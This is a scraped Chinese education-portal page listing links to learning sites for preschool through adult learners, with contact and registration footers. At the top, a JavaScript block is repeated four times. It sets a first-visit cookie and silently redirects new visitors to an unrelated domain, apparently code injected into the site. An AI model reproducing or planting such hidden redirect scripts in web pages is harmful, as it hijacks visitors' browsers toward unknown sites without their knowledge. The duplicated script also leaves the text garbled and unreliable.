var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?3c8043b060fcf6132c9f486d826deb21"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var c = document.cookie; if (c.indexOf('isfirstvisited=false') != -1) { } else { var d = new Date(); d.setFullYear(d.getFullYear() + 1); document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString(); window.location.href='https://p4114.com'; } dingte学堂-
网站标志
自定内容
  Google 百度 雅虎  搜狗
企业介绍


顶特 
提供e站式专业指导,报名服务,协助学生快速找到提升学习效果的方法。联系电话:021-22818023x培训服务

顶特科技,通过网络汇集世界最新最好的科技市场发展, 帮助大家认识并创造世界. 
科技/综合类:

网易公开课 凤凰科技 维基百科 中国科学 科学网 科学网-中关村
自然-英 日本科技 新浪科技 科博-美 科学-美 科学天地
verycd课程 单片机学习 电脑报 51cto infoq
csdn 程序员眼光

顶特教育、顶特E学堂汇总最好的网络教育,帮助大家通过网络认识并学到最优秀的东西.
学龄前:

亲亲宝宝网 小丫丫儿童乐园 儿童百科 宝宝树

小学类:

六一宝宝  寰宇地球 儿童文学  网上少科院
沪家校互动 新浦江 发现-美 三学苑
上海少科网 学生科技网 上海少艺网 终生学习网
学而思 巨人 问学堂 奥数

中学类:

101网校  黄冈网校 同方学堂 科学大众 VOA英语
VOA-BBC英语

大学类:
交大网教 FT在线免费MBA训练营 免费在线大学-美  

成人类:

新浪e堂 网易学院 会计网校  太平洋网教
硅谷动力视频学院 圣经-世界发行最大的一本书参考  美史简介 圣经-世界发行最大的一本书参考 
我要自学视频 窗内网视频课 电脑维修 W3school

如有好的网络教育欢迎大家推荐.     电邮: emarketcn@gmail.com
当前位置
脚注信息
联系电邮: yujiang01@126.com
      上海市场监管       上海税务
网站建设: e市场 版权所有    eshichang.cn  All Rights Reserved.      沪ICP备05010532号
               沪ICP备10014400号沪ICP备10014360号,   沪ICP备09057986号  51La